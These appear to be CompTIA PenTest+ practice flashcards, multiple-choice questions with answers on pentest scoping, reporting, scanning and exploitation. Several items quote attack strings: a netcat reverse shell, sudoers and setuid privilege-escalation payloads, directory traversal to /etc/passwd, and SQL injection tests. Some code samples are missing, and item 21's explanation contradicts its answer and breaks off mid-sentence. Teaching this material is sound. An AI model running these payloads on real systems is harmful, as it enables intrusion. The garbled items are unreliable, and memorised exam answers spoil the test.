TotalTester Online: CompTIA Pen Test+ Certification Exam PTO-001 Flashcards

1
Q

During an internal pentest of a company’s network, you find that a substantial number of Active Directory user account passwords on the Windows domain are susceptible to brute-force login attacks, using passwords of no more than six characters in length, with little to no password complexity.
Which mitigation strategy should you recommend to the customer?
A.Don’t use passwords susceptible to dictionary attacks
B.Limit character reuse
C.Enforce a stronger password policy
D.Remove default user accounts on the system

A

C.Enforce a stronger password policy

Explanation:
The customer's network in the scenario lacks the ability to enforce stronger password settings, which can be controlled using both a technical policy and an administrative control policy.
The administrative policy can inform users that they must use passwords that meet a certain level of complexity, and a technical policy can enforce the actions of the administrative policy using a configuration setting.

A, B, and D are incorrect.
A is incorrect because telling the customer not to use passwords susceptible to dictionary attacks only highlights the weakness and is not a mitigation strategy.
B is incorrect because limiting character reuse during the password creation process may not alter the complexity of the password, thus not preventing passwords used on the domain from being susceptible to brute-force logins.

D is incorrect because removing default user accounts on the system doesn't address the issue of weak passwords.

2
Q

You are tasked with completing an internal pentest of the ABC company’s network.
To be sure you cover all the levels of trust within the company’s network, which methods of access should you conduct testing from? (Choose three)
A.Limited access
B.User-level access
C.Privileged-level access
D.Executive-level access
E.All of the above

A

A.Limited Access
B.User-level access
C.Privileged-level access

Explanation:
A, B, and C are correct.
A is correct because limited access affords the initial connectivity to the targets, such as a connection to the network (physical or wireless) from which you attempt to exploit a higher level of access on the network, such as user-level or privileged user access.

B is also correct because this level of access assumes the identity of a trusted insider with the basic permissions that a typical user on the network would have.

You can attempt to exploit this level of access to obtain privileged user access, from which you can attempt to escalate from local admin to domain admin on an Active Directory network.

D and E are incorrect because executive-level access is not a recognized access level and will likely fall within the other three categories of access permissions, such as user-level access or privileged-level access on the network.

3
Q
The rules of engagement (RoE) document MUST contain a signature from which of the following? (Choose all that apply)
A.Service vendor
B.Organizational management
C.Finance Department
D.Contracts Department
A

A.Service vendor
B.Organizational management

Explanation:
A and B are correct. A is correct because the service vendor carries out the execution of the pentest.

B is correct because organizational management is responsible for working with the vendor to ensure they have what they need to be successful, and for providing direct oversight of the project.

C and D are incorrect because the finance department is responsible for paying the purchase order for the work and verifying the service vendor's invoice.

The contracts department is involved when signing other contractual documents such as the MSA or SOW and holds the service vendor accountable for all contractual obligations.

4
Q
Critical findings in a pentest are likely to have \_\_\_\_\_ on a customer network.
A.a high impact
B.a low impact
C.a medium impact
D.no impact
A

A.a high impact

Explanation:
Critical findings will have a high impact on the network, based on certain environmental factors such as the sophistication of the exploit and how it affects the confidentiality, integrity, and availability of the system/network.

B, C, and D are incorrect. B is incorrect because low impact findings are rated with a low severity.

C is incorrect because medium impact findings are rated with a medium severity.

D is incorrect because there are no findings that should be categorized with a "no impact" level of severity.

5
Q

Using the following example PHP code, what type of attack could this application be susceptible to?

Example HTTP GET request:
http://www.example.com/test.php?img=photo1.png

Example PHP Code:

A

A.Directory traversal attack

Explanation:
The example URL will attempt to retrieve photo1.png from the web server and render the image in the browser.

The example PHP code shows that the value of the img= parameter, photo1.png, should be retrieved from $WebDir, which points to the local file system path '/var/www/html'.

However, because the code provides no input validation, it could be susceptible to directory traversal to access files outside the intended location using ../../../etc/passwd.

B, C, and D are incorrect.
B is incorrect because the application would not be susceptible to a SQL injection, as there is no mention of a database function within the code.

C is incorrect because the PHP code does not execute directory indexing.

D is incorrect because clickjacking is a client-side attack that tricks a user into clicking on a button or link within a web page they were not intending to interact with.

This attack makes use of CSS, iframes, and even text boxes to load legitimate web content through an attacker-controlled web page.

6
Q

The runme.py script is executed through a root cron job every day from the NFS share called /share.

The permissions on the script allow anyone to write to the file.

You have user-level privileges as the "user1" account on the Linux target where the cron job is executed from.

Which of the following options could you append to the script to further exploit the target? (Choose all that apply)
A.os.system('chmod 4447 /bin/bash')
B.os.system('cp /bin/vi /share; chmod 4447 /share/vi')
C.os.system('cat /etc/shadow')
D.os.system('echo "user1 ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers')

A

B.os.system('cp /bin/vi /share; chmod 4447 /share/vi')
D.os.system('echo "user1 ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers')

Explanation:
B is correct because you can use a system call to copy the vi command (as root) to the NFS share and apply a setuid bit to the executable.

When the new vi command is executed, you can escape the shell and execute commands as root.

D is also correct because you can echo a line into the /etc/sudoers file so that your user account can execute commands as root with no password.

A and C are incorrect. A is incorrect because bash has setuid restrictions that will prevent the shell from executing with root privileges.

C is incorrect because reading the /etc/shadow file will happen inside root's cron job process, so the output will not be visible to your user account.

However, if you redirected the output of the command to a file, you would be able to read the shadow file.

7
Q

During a physical pentest, your team was able to duplicate a valid employee's proximity card and would like to use it to gain access to the server room.
What type of attack is described in this scenario?
A.RFID Cloning
B.SPP
C.Lock bumping
D.Egress sensor bypass

A

A.RFID Cloning

Explanation:
RFID cloning (badge cloning) is the process of duplicating a valid identification card used for physical entry

B is incorrect because single pin locking (SPP) is a technique used for picking the pins in pin tumbler locks
C is incorrect because lock bumping is a technique used for brute-forcing door locks

D is incorrect because an egress sensor bypass is not used to clone identification cards, but rather is accomplished by wedging a piece of paper between the top of the door and the door frame to trigger the motion sensor to release the magnetic door lock, allowing unauthorized entry through the door.

8
Q
Which type of assessment is required for organizations that accept, process or store consumer payment card information?
A.PCI DSS
B.HIPAA
C.Red team
D.FISMA
A

A.PCI DSS

Explanation:
The Payment Card Industry Data Security Standard assessment is required for organizations who accept, process or store payment card information for customers and merchants

B is incorrect because HIPAA is for organizations that manage personal health information.

C is incorrect because a red team assessment is used to simulate advanced persistent threats (APTs) on an organization's network.

D is incorrect because Federal Information Security Management Act (FISMA) assessments are for organizations that use government networks and are mandated under US federal regulations.

9
Q
Which of the following Windows shares are readable on the local area network by default?
A.ADMIN$
B.IPC$
C.C$
D.All of the above
A

B.IPC$

Explanation:
The IPC$ share, also known as the null session share, allows anonymous hosts on the network to perform certain activities such as enumerating domain accounts and network shares

A and C are incorrect because the ADMIN$ and C$ Windows shares are only accessible over the network by local or domain administrator accounts

D is incorrect because not all of the shares are readable by anonymous users on the network

10
Q
By default, what type of queries will a Windows host send over the network if it cannot resolve the hostname through DNS? (Choose all that apply)
A.LLMNR
B.NBNS
C.ARP
D.ICMP
A

A.LLMNR
B.NBNS

Explanation:
In the event that a Windows host cannot resolve a hostname, such as the WPAD (web proxy auto-discovery protocol) server hostname, through DNS, it will send Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBNS) queries over the network by default; however, this default behavior can be disabled or changed.

C is incorrect because ARP is used for resolving an IP to a MAC address

D is incorrect because ICMP is used for communicating with hosts over the network and sending error messages and other operational information regarding services over the network

11
Q

During a pentest, you were successful with gaining remote user-level access to a Windows 10 host on the ABC Active Directory Domain.

The customer utilizes sophisticated intrusion detection capabilities.

Part of the RoE suggests utilizing attack techniques that might go undetected.

Which of the following would be the BEST choice when carrying out additional attacks from the compromised host?
A.Leverage native capabilities from the host and try to blend in with normal activity until you get a feel for how the IDS capabilities are configured
B.Copy tools such as pwdump.exe and ncat.exe over to a staging area on the local file system and start planning an attack strategy
C.Use msfvenom to generate a Meterpreter payload for the compromised target, then copy it over to the local file system and execute the payload to get a reverse, encrypted shell to use for interacting with the target
D.Establish a foothold on the target using the Empire framework, in order to further exploit Active Directory Domain

A

A.Leverage native capabilities from the host and try to blend in with normal activity until you get a feel for how the IDS capabilities are configured

Explanation:
Given the current scenario, it is unknown how sophisticated the customer's defense capabilities are, so gaining situational awareness is a critical step in the post-exploitation phase and can help a pentester gather important knowledge of the host and internal network.

Once you know how the system and environment are configured, you can start planning your next move, such as whether an exploitation framework is safe to use, and which exploits or attacks could trigger unnecessary alarms/alerts on the network.

B is incorrect because there is not enough information provided to determine whether those actions can support post-exploitation capabilities without being detected.

C is incorrect because putting unnecessary executables or exploits on the local file system could trigger the antivirus software.

D is incorrect because it is best to wait until you gain situational awareness of the environment and surroundings before carrying out an attack strategy; acting first would mean proceeding without a well-thought-out plan.

12
Q

After obtaining root access through a local privilege escalation vulnerability on a Linux server, you decided to create a cronjob to call back to your attack host with a remote shell every hour in case the system administrator reboots the server.
This technique is known as what? (Choose all that apply)
A.Maintaining persistence
B.Lateral movement
C.Pivoting
D.Creating a backdoor

A

A.Maintaining persistence
D.Creating a backdoor

Explanation:
Creating a cron job to call back to your attack host would be considered both maintaining persistence and creating a backdoor into the customer's network.

B is incorrect because lateral movement would be remotely connecting to other hosts on the customer's network or domain using native operating system commands, such as ssh, with the same user's domain credentials.

C is incorrect because pivoting would be the process of utilizing a compromised target or host within your control to exploit trust relationships within the domain.

For example, establishing a foothold on the compromised target in the customer network behind an external firewall, then creating an SSH tunnel through the firewall to stage attacks against other internal network targets from the compromised target

13
Q

What is this command doing?
'nc 192.168.1.50 4444 -e cmd.exe'

A.Forward a command shell from the local Linux host to a remote host over the network
B.Forward a command shell from the local Windows host to a remote host over the network
C.Forward a command shell from the remote host to the local Linux host over the network
D.Forward a command shell from the remote host to the local Windows host over the network

A

B.Forward a command shell from the local Windows host to a remote host over the network

Explanation:
The netcat (nc) utility can be used to forward data to remote hosts over the network.

The command in this example is forwarding a command shell from the local Windows host to a remote host listening on port 4444/tcp.

A is incorrect because the shell that is being forwarded is a Windows command shell (cmd.exe), which indicates the local host is Windows.
C and D are incorrect because the command is connecting to the remote host IP address of 192.168.1.50.

If the connection were to the local host, the loopback address of 127.0.0.1 could be used, but otherwise there is no need to connect back to the local host if the pentester already had access to the target box.

14
Q
Organizations looking for an evaluation that tests their defense posture against real-world attacks that involve stealth and blended methodologies and that test time to detection, time to response and resilience against specified modeled threats would be looking for which type of assessment?
A.Compliance-based
B.Goals-based
C.PCI DSS
D.Red team
A

D.Red team

Explanation:
A red team assessment, or red teaming, will evaluate how well an organization would fare given a scenario of a real-world attack by skilled attackers.

Red teaming involves stealth and blended methodologies (such as social engineering and network pentesting).
The goals of red teaming are to test time to detection, time to response, and resilience against specifically modeled threats using tactics not limited to a single attack scope.

A and C are incorrect because those types of assessments would satisfy compliance and regulatory based assessments

B is incorrect because goals-based assessments cover specific goals, or objectives, within a defined scope whereas red teaming could expand using tactics that are not limited to a single attack scope

15
Q
Which testing methodology or methodologies should an organization consider when scoping and planning for an engagement? (Choose all that apply)
A.Black box
B.White box
C.Gray box
D.All the above
A

D.All the above

Explanation:
All of the answers are testing methodologies that should be considered when planning and scoping an engagement

16
Q

During a pentest, you successfully recover NTLM hash values for most of the users in an Active Directory domain; however, you are unable to execute PtH attacks due to environmental restrictions.

Therefore, you decide to use the hashcat utility to crack the hashes offline.

Which hashcat mode will you use to crack the hashes?
A. -m 2500
B. -m 300
C. -m 1000
D. -m 0
A

C. -m 1000

Explanation:
The hash mode for NTLM in hashcat is represented as 1000

A is incorrect because that hash mode is for WPA.

B is incorrect because that hash mode is for LANMAN hash values.

D is incorrect because that hash mode is for MD5 hash values

17
Q

The following command will do what to the wireless network interface?

'airmon-ng start wlan1'

A.Inject packets on the wireless network
B.Put WLAN1 into monitor mode
C.Enable the wireless interface card
D.None of the above

A

B.Put WLAN1 into monitor mode

Explanation:
The airmon-ng command utility is used to put the wireless interface into monitor mode.

A is incorrect because 'aireplay-ng' is the Aircrack-ng utility that is capable of injecting packets on the wireless network.

C is incorrect because the interface card should already be enabled prior to using airmon-ng

D is incorrect because at least one answer is correct.

18
Q

In certain situations, a pentester may need to download, modify and complete an exploit for the target architecture.

Which command can a pentester use to accomplish this task in a Unix-like environment?
A. adb
B.gcc
C.apk
D.gdb
A

B.gcc

Explanation:
The GNU compiler (gcc) is a utility that will compile source code written in the C programming language for the architecture the program will run on

A is incorrect because the Android debug bridge (adb) is a command utility that will allow you to connect to an Android device from a computer using a USB cable

C is incorrect because an Android application package (APK) is a file format for the packages installed on Android devices, not a compiler

D is incorrect because the GNU debugger (gdb) is the command utility to debug programs, not compile them

19
Q
VNC passwords that rely on DES encryption can be a maximum of how many characters in length?
A.6
B. 8 
C.10
D.12
A

B. 8

Explanation:
VNC passwords that use DES encryption will be truncated to the length of eight characters, regardless of what the user sets the password to be.

This is a limitation of DES

A, C, and D are incorrect because DES encryption as used by VNC supports passwords up to eight characters in length.

20
Q
\_\_\_\_\_\_ is a tactical process for surveying an area for wireless access points while in a moving vehicle.
A.Stumbling
B.Scanning
C.Wardriving
D.Enumeration
A

C.Wardriving

Explanation:
Wardriving is a tactical process for surveying an area for wireless access points while in a moving vehicle in order to identify wireless networks and potential targets in a certain area of interest.

A is incorrect because stumbling is a surveillance technique used for discovering SSIDs, router vendor information, signal strength, MAC addresses, channels, and so on.

B is incorrect because scanning is the process of examining or studying the surface of an object.

In regard to scanning a network, this option is a little more obtrusive than wardriving.

D is incorrect because enumeration is the process of extracting information from a particular target, rather than passive surveillance of a target area during reconnaissance

21
Q

The following lines of code will echo a random_msg every second until var equals 10.

However, the same message is echoed each time through the loop

What could you do to help randomize the messages that are echoed in the terminal?
A.Move line 9 outside of the while loop
B.Move line 5 within the while loop
C.Move line 4 below line 11
D.Move line 3 below line 8
A

C.Move line 4 below line 11

Explanation:
A seed value is a number used to initialize a pseudorandom number generator.

The Bash script requires the statement that generates a random seed value (line 5) to be placed within the while loop to help randomize the message that is echoed to the terminal when the script is executed.

When the condition is not in the loop, the script will echo the same message until the value of $var equals 10

A is incorrect because moving line

22
Q

During the internal portion of a pentest, you notice an executable called newcmd.exe in the C:\Windows\Temp folder on one of your targets.

The executable is also in the process listing, running with SYSTEM privileges and consuming a great deal of hardware resources on the host.

You consult with your team, and no one else has touched this target.

What is the best course of action for this scenario?
A.Inform the customer immediately of the potential compromise
B.Include the incident in the pentest report, but don't bother the customer at this time
C.Conduct malware analysis against the executable
D.Remove the executable and inform the customer

A

A.Inform the customer immediately of the potential compromise

Explanation:
Given a scenario that may require deconfliction, your pentest team may need to sort out the pentest artifacts from the artifacts of a real compromise.

23
Q
JTAG can be used for which of the following?
A.Application debugging
B.Debugging embedded devices
C.Jailbreaking
D.Rooting Android devices
A

B.Debugging embedded devices

Explanation:
JTAG is used for debugging embedded devices (hardware)

24
Q

In regard to a pentest report, what is a testing narrative?
A.It offers details as to the testing methodology that was executed and the outcome
B.It provides details for each tool used to conduct the testing
C.It shows how successful the pentest team was in conducting the assessment
D.It's required for PCI, HIPAA, and FedRAMP pentests

A

A.It offers details as to the testing methodology that was executed and the outcome

25
Q

During a pentest, your team is having issues running a root setuid program on an NFS file system in a directory named /share

The permissions on the executable are 4777

What is the likely cause of the problem?
A.The program is missing the executable flag
B.The NFS share is mounted with the nosuid option
C.The setuid flag is missing on the program
D.Your team is not executing the program using the full path

A

B.The NFS share is mounted with the nosuid option

Explanation:
An NFS file share configured to mount with the nosuid option will prevent executables on the share from executing with the privileges of the program owner.
This is a security feature to defend against using NFS to facilitate privilege escalation attacks on the local OS.

26
Q
The SOW includes information pertaining to all except which of the following subjects?
A.Location of work
B.Period of performance
C.Allocation of risk
D.Scope of work
A

C.Allocation of risk

Explanation:
The allocation of risk is a provision within the master service agreement (MSA) that defines levels of responsibility between each party

27
Q

Your team is attempting to crack an MD5 password hash using a dictionary-based attack, thus far without success.
Your team knows the length and complexity of the password based on the target's password policy.
Which technique might give your team a better chance at cracking the password?
A.Using rules
B.Brute force
C.Password guessing
D.Hash-identifier

A

A.Using rules

Explanation:
A predetermined set of rules to make certain letters uppercase, lowercase and so forth can help improve the efficiency of the attack when the length of the password is known and can help the team work smarter instead of harder

28
Q
Which contractual document is signed by two consenting parties to protect each other's competitive advantages?
A.RoE
B.SoW
C.NDA
D.MSA
A

C.NDA

Explanation:
A nondisclosure agreement is a confidentiality agreement that protects a business's competitive advantage by protecting its proprietary information and intellectual property.

This document is fully executed by both parties (signed into action) prior to working together.

29
Q

In the context of a pentest report, a finding is a weakness that could be advantageous to an attacker and, when documented in the report, includes actionable items from exploitation and post-exploitation activities.

Which of the following would be considered findings that should be included in the pentest report?
A.A SQL Injection vulnerability provided the pentest team direct access to the production database server
B.The pentest team conducted MiTM exploitation against assets operating on the LAN
C.The pentest team successfully bypassed the physical locking mechanism of the cipher lock using a known bypass to gain access to the organization's telecommunications closet
D.The vulnerability scanner found that the version of SSL being used does not meet industry best practices.
However, this vulnerability was not found when the scan was executed from inside the trusted network

A

A.A SQL Injection vulnerability provided the pentest team direct access to the production database server

C.The pentest team successfully bypassed the physical locking mechanism of the cipher lock using a known bypass to gain access to the organization's telecommunications closet

Explanation:
A and C are correct because they describe the exploitation of a vulnerability and provide supporting written evidence of a finding.

B is incorrect because conducting MiTM testing does not constitute a finding; rather, it is a testing activity that can be added to the testing narrative to describe internal testing on the LAN.

30
Q
A long-running, persistent mechanism that can run as a background process on a target Linux server is known as what?
A.Script
B.Executable
C.Cronjob
D.Daemon
A

D.Daemon

Explanation:
A daemon is a long-running program that is typically started at boot or when an application is launched from a terminal window, and runs as a background process rather than under the direct control of an interactive user.

A is incorrect because a script is not considered a long-running, persistent program, as it executes under the control of an interactive user or process, such as a cron job, but terminates after it completes its associated tasks.

B is incorrect because an executable is just a program file until it is started by a user or a process.

C is incorrect because a cron job is not long running; it will execute and terminate within a certain period of time.

31
Q
The unquoted service path vulnerability can be used to escalate privileges on a Windows target and exploits what function of the OS?
A.CreateProcess
B.Task Scheduler
C.Weak Access Controls
D.Windows Registry
A

A.CreateProcess

Explanation:
Unquoted service paths are a direct result of the CreateProcess function in Windows operating systems, where the name of a directory or program in the search path is truncated when the function identifies a blank space in the path.

Windows will attempt to load each truncated executable until it finds the correct one

B is incorrect because the Task Scheduler is a Windows component used for managing the execution of Windows scheduled tasks.

C is incorrect because weak access control is a misconfiguration of the operating system, not a function.

D is incorrect because the Windows registry is a collection of databases of Windows configuration settings, not a function of the OS

32
Q
The WHOIS directory service was developed in the 1980s to query what type of information?
A.IP information
B.Host information
C.Domain registration information
D.User information
A

C.Domain registration information

Explanation:
The WHOIS directory service was developed to look up domain registration information from registry databases administered by multiple registries and registrars around the world.

A and B are incorrect because that information is typically searched and obtained through Domain Name System (DNS) queries.

D is incorrect because user information is not obtained from a WHOIS lookup; however, registrar contact information might be searchable if the registration of the domain is not private.

33
Q
The Android operating system relies on which type of database to store data in the form of a flat file on the end user's mobile device?
A.mongoDB
B.MySQL
C.SQLite
D.PostgreSQL
A

C.SQLite

Explanation:
The SQLite database is used by Android to store data on the end user's mobile device.

A, B, and D are incorrect, as these database types are typically found in non-mobile, Unix-like and Windows environments.

34
Q

During a pentest, your customer asks you to review a log entry from a target web server, as the malicious traffic appears to originate from one of your team's authorized IPv4 addresses.
The log file shows the following:

'GET /info.php?id=1%20AND%201=1 HTTP/1.1 200'

What is your team member most likely testing for?
A.Command injection
B.XSS
C.SQL Injection
D.CSRF
A

C.SQL Injection

Explanation:
The AND operator is passed in the URL to generate a true statement to see if the application is vulnerable to a SQL Injection attack.

URL encoding (%20) is used for whitespace in the URL request.

A is incorrect because the request was not using a command such as cat, ls, id, etc. as the value parameter is used to reference a record in the database

B is incorrect because the log entry does not have any JavaScript code in the parameter, which is a characteristic of a cross-site scripting (XSS) attack.

D is incorrect because there was no attempt to exploit a cross-site request forgery (CSRF) in the web request

35
Q

Prior to the pentest, the customer provides your team with support resources and artifacts in order for your team to assist with the validation testing during an internal assessment.

Among these artifacts is the SOAP project file.

Which of the following best describes the purpose of the artifact?
A.Provides a machine-readable XML description of HTTP-based web services
B.Elaborates on the framework used to develop the software application
C.Describes the format for receiving and sending messages
D.Formally describes the elements comprising an XML document

A

C.Describes the format for receiving and sending messages

Explanation:
The Simple Object Access Protocol (SOAP) project file describes the format for receiving and sending messages between web-based services.

A is incorrect because a machine-readable XML description of HTTP-based web services is found in the Web Services Description Language (WSDL).

B is incorrect because the software development kit (SDK) documentation elaborates on the framework used to develop the software application.

D is incorrect because the Extensible Markup Language (XML) Schema Definition (XSD) is used to formally describe the elements comprising an XML document.

36
Q

What does the following script do?
A.Copies log files to another directory and then removes all the logs
B.Moves log files to another directory and then secure copies the files to another host using a password
C.Moves log files to another directory, then secure copies the files to another host using scp, and then removes the files that were secure copied
D.Secure copies the files and then removes the files from the remote host

A

C.Moves log files to another directory, then secure copies the files to another host using scp, and then removes the files that were secure copied

Explanation:
The bash script counts the number of files in the $log_dir directory, and then uses a conditional statement to verify that there are indeed files in that directory.
If there are files in the $log_dir directory, the script moves them to the $dst_dir directory, secure copies the log files to the remote host with scp, and then removes the files from $dst_dir after they have been secure copied.

A, B and D are incorrect

A is incorrect because the script does not remove all the logs once it copies them to another directory

B is incorrect because the secure copy is done with an SSH key, not a password

D is incorrect because the script does not remove the file from the remote host

37
Q
Mechanical locks such as a pin tumbler lock can be defeated using which of the following techniques?
A.SPP
B.Raking
C.Jiggling
D.All of the above
A

D.All of the above

Explanation:
Single pin picking (SPP), raking, and jiggling are all lock-picking skills that can be used to defeat the security mechanism in mechanical locks such as a pin tumbler lock.

38
Q

The customer is using SSH for remote logins and transferring files to hosts on the local area network.

However, you also found FTP and Telnet open on most of the Unix servers in the customer environment.

The system admin says they don't use those legacy programs any longer.

How would you document this in a pentest report, even though you did not exploit these services?
A.Record this as a critical finding
B.Include as an “unnecessary open services” observation in the executive summary
C.Do not address this in the report, since the services are on the LAN and are not exposed to external attacks
D.Ask for additional time to test the services

A

B.Include as an “unnecessary open services” observation in the executive summary

Explanation:
Testing observations, such as the use of unnecessary open services, can be addressed in the executive summary section of the pentest report.

This can help management understand that there may be inconsistent practices used for administration of the network, or a lack of configuration management guidance.

These types of cultural issues can be remediated with the help of a top-down management approach, where senior leadership sets the vision and delegates subordinates to carry out the new organizational goals.

A is incorrect because the observation is not a finding, as the legacy services were not exploited.

C is incorrect because any noteworthy observations, especially ones that might point to a bigger-picture problem, should be documented in the pentest report so senior leadership can address and prioritize them accordingly.

In the case of unnecessary services, if you find that most of the hosts on the network have not been patched in over a year and they are running legacy services, this is evidence that the customer is failing to follow industry best practices on the network in more places than one, which could be a cultural issue (lack of knowledge, expertise, or motivation) or a resource issue.

39
Q

Which of the following is a valid reason for executing an authenticated vulnerability scan against a target?
A.It produces more findings
B.You will be able to show more impact in your test results
C.It helps to reduce false positives
D.The scan will help exploit target weaknesses and carry out post-exploitation activities

A

C.It helps to reduce false positives

Explanation:
Executing an authenticated vulnerability scan can help reduce the number of false positives reported by a vulnerability scanner, as the credentials used during the scan allow it to verify a patch level or configuration setting directly, whereas an unauthenticated scan relies on a service banner or a trivial fuzzing technique that may or may not be enough to guess at the existence of a vulnerability.

40
Q
Which type of confidential document covers items such as social responsibility, business ethics, network and facility access and so forth?
A.MSA
B.SOW
C.RoE
D.NDA
A

A.MSA

Explanation:
The master service agreement (MSA) is a type of overarching contract between two or more parties in which each party agrees to most of the terms that will govern all future transactions, such as payment terms, dispute resolution, social responsibility, business ethics, and network and facility access.

41
Q
Which type of attack will help speed up the cracking process for a WEP key by injecting arbitrary packets into the wireless access point, but does not actually crack the key?
A.Deauthentication attack
B.Initializing vector
C.Karma Attack
D.Fragmentation attack
A

D.Fragmentation attack

Explanation:
A fragmentation attack is very similar to the ChopChop attack.

This type of attack speeds up the cracking process for a Wired Equivalent Privacy (WEP) key by injecting arbitrary packets into the wireless access point, but it does not actually crack the key.

The fragmentation attack exploits the pseudorandom generation algorithm (PRGA) sequence in RC4, where after 4096 packets, two will likely share the same initialization vector (IV) and thus the same RC4 key.

42
Q

The following code was used to exploit a target web server during a pentest.

What type of attack did this exploit take advantage of?

]>

&xxe;>/user>
mypass

A.Path traversal attack
B.RFI
C.XXE Injection
D.LFI

A

C.XXE Injection

Explanation:
The XML code takes advantage of the Expect module to execute commands (XXE injection) against the web server.

A is incorrect because the XML code does not traverse the local file system or web root of the web server.

B is incorrect because the XML code is not reaching out to a malicious web page or application to execute remote code.

D is incorrect because the XML code is not including files; it's executing system commands.

43
Q
Which fully executed document provides authorization from an organization to conduct a pentest and will include or elaborate on subjects defined in the SOW?
A.NDA
B.MSA
C.Contractual agreement
D.RoE
A

D.RoE

Explanation:
The Rules of Engagement (RoE) document puts into writing the guidelines and constraints regarding the execution of a pentest and typically elaborates on subjects in the SOW, such as the testing method, target selection, etc.

Once the RoE is signed by an authorizing official within the organization and all other respective parties, the fully executed (FE) document provides the pentest team with authorization to carry out the agreed-upon terms and conditions.

44
Q

When executing a UDP port scan against a customer network, you want to start out by scanning only those ports that are known to have UDP services present.

Which of the following options can you use to scan for SNMP, NTP, NetBIOS, and DNS?
A.nmap -vv -sUV -p 53, 123, 137-139, 161 123 192.168.1.0/24 -oA udp scan
B.nmap -vv -sUV -p 53-161 192.168.1.0/24 -oA udpscan
C.nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan
D.nmap -vv -sUV -p 53-123, 137, 139, 161 192.168.1.0/24 -oA udpscan

A

C.nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan

Explanation:
The -p port flag is used to specify the particular port or port range to use for the scan.

Each port must be specified either as a range or as a comma-delimited list with no spaces:
SNMP - 161
NTP - 123
NetBIOS - 137-139
DNS - 53
45
Q
Which command can be used to help analyze the contents of a binary file? (Select all that apply)
A.strings
B.cat
C.echo
D.binwalk
A

A.strings
D.binwalk

Explanation:
A is correct because the strings command is a useful Linux utility that prints the strings of printable characters (that is, ASCII characters) in files that are at least four characters in length.

D is correct because the binwalk command is a fast and easy-to-use tool for analyzing and reverse engineering executables and firmware images, such as those loaded on embedded systems like Wi-Fi routers, IoT devices, and so on.

46
Q

During an ICMP discovery scan on the customer's LAN, you find that the target hosts are not responding, which could be due to the local Windows firewall settings on the hosts.

Which of the following nmap command options could you use to aid in the discovery of hosts on the LAN? (Select all that apply)
A.-Pn
B.-sS
C.-sU
D.-sL
E.All of the above
A

A.-Pn
B.-sS
C.-sU

Explanation:
The -Pn option disables host discovery within Nmap and treats all hosts as alive, -sS conducts a port scan against TCP ports, and -sU conducts a port scan against UDP ports.

D is incorrect because the -sL option is used only to list the targets that would be scanned, based on what is supplied in the input.

47
Q

You have been tasked with developing the rules of engagement (RoE) document for an upcoming pentest for company ABC, which has target assets hosted in Azure and AWS.

What kind of information might you want to include in the RoE? (Choose all that apply)
A.Target IP addresses
B.Cloud service provider approvals
C.Payment terms and conditions
D.Testing Schedule
E.Brute-force tactics and potential side effects
F.All of the above

A

A.Target IP addresses
B.Cloud service provider approvals
D.Testing Schedule
E.Brute-force tactics and potential side effects

Explanation:
A is correct because target selection (IP addresses) is captured within the RoE.

B is correct because cloud service provider approvals may be required so they know the pentest is occurring and can plan accordingly.

D is correct because the testing schedule defines the timeline for when the engagement will take place.

E is correct because the RoE defines the tools, techniques, and methodology that the customer will need to approve prior to starting the pentest.

48
Q

UDP is a connectionless protocol.

Which of the following options use this protocol for communication?
A.DNS
B.SSH
C.NetBIOS
D.TFTP
A

A.DNS
C.NetBIOS
D.TFTP

Explanation:
DNS (53/udp), NetBIOS (137/udp, 139/udp), and TFTP (69/udp) all rely on the connectionless protocol.

49
Q
What defines the requirements and objectives for a pentest?
A.Scope
B.Executive summary
C.Rules of engagement
D.Nondisclosure agreement
A

A.Scope

Explanation:
The scope outlines the objectives and requirements for the assessment.

During the scoping phase, you attempt to address the testing requirements, target selection, scheduling and timelines, and the strategy for testing.

50
Q
Mitigation strategies could be provided for which of the following categories?
A.People
B.Technology
C.Processes
D.All of the above
A

D.All of the above

Explanation:
People, technology, and processes could be the cause of a vulnerability within the organization or the network.

However, these elements can also carry, identify or implement the solution to help remediate the problem

51
Q

Which of the following options is an example of Boolean-based SQL injection? (select all that apply)
A.www.example.com/info.php?id=1 AND 1=1
B.www.example.com/info.php?id2;2–
C.www.example.com/info.php?id=2 AND 3=4
D.www.example.com/info.php?id=1;UNION SELECT * from mysql users;–

A

A.www.example.com/info.php?id=1 AND 1=1
C.www.example.com/info.php?id=2 AND 3=4

Explanation:
Boolean-based SQL injection is where you ask the database true or false questions and determine the answer based on the response given by the application, where the response could be a content error or a blank page.

52
Q

During a pentest, you discover users and admins are following poor password-generation practices on the domain, such that passwords are either guessable or subject to dictionary attacks.

Which of the following BEST describes the appropriate remediation guidance for the customer?
A.Incorporate a stronger password complexity policy on the domain
B.Provide training to improve oversight of and compliance with organizational password policy requirements
C.Move to using 2FA or RADIUS to reduce the risk of passwords getting compromised
D.Change passwords for all users and admins after enforcing a new password complexity requirement on the domain

A

D.Change passwords for all users and admins after enforcing a new password complexity requirement on the domain

Explanation:
Recommending that a new password complexity requirement be enforced on the domain is essential, as most of the passwords for both admin and user accounts were susceptible to dictionary-based attacks.

Then, having all of the users and admins change their passwords after password complexity has been enforced on the domain will help ensure passwords adhere to the new organizational requirement.

A is incorrect because incorporating a stronger password policy on the domain is only part of the solution.

Users and admins need to change their passwords so the new policy can take effect.

B is incorrect because providing training to improve oversight of and compliance with organizational password policy requirements is good, but it doesn't enforce a technical control to resolve passwords susceptible to dictionary-based attacks.

C is incorrect because it introduces a solution where the gains do not balance the complexity of implementation for all domain accounts.

53
Q

During a pentest, you identify a wireless access point that is configured to use WPA2 PSK as well as WPS.

Why would you want to use a tool like Reaver to attack WPS instead of attempting to capture the four-way handshake from a wireless client using the Aircrack-ng utilities and then crack the PSK offline?

A.If you can recover the WPS PIN, the router will give you the plaintext value of the PSK. If the PSK is a strong password, it may take a while to crack offline
B.Reaver attacks a WPS implementation weakness in the registrar, however, the PSK can be recovered if Reaver can recover the four way handshake
C.Reaver can be used to attack weaknesses in WPS and capable of recovering the PSK through offline attacks
D.You should not use Reaver to recover the WPS PIN when you can recover the PSK as it is trivial to recover the plaintext value of the PSK using the four way handshake and a simple dictionary

A

A.If you can recover the WPS PIN, the router will give you the plaintext value of the PSK. If the PSK is a strong password, it may take a while to crack offline

Explanation:
Reaver attacks a WPS implementation weakness in the registrar functionality, where it only takes 11,000 attempts to guess the correct WPS PIN.

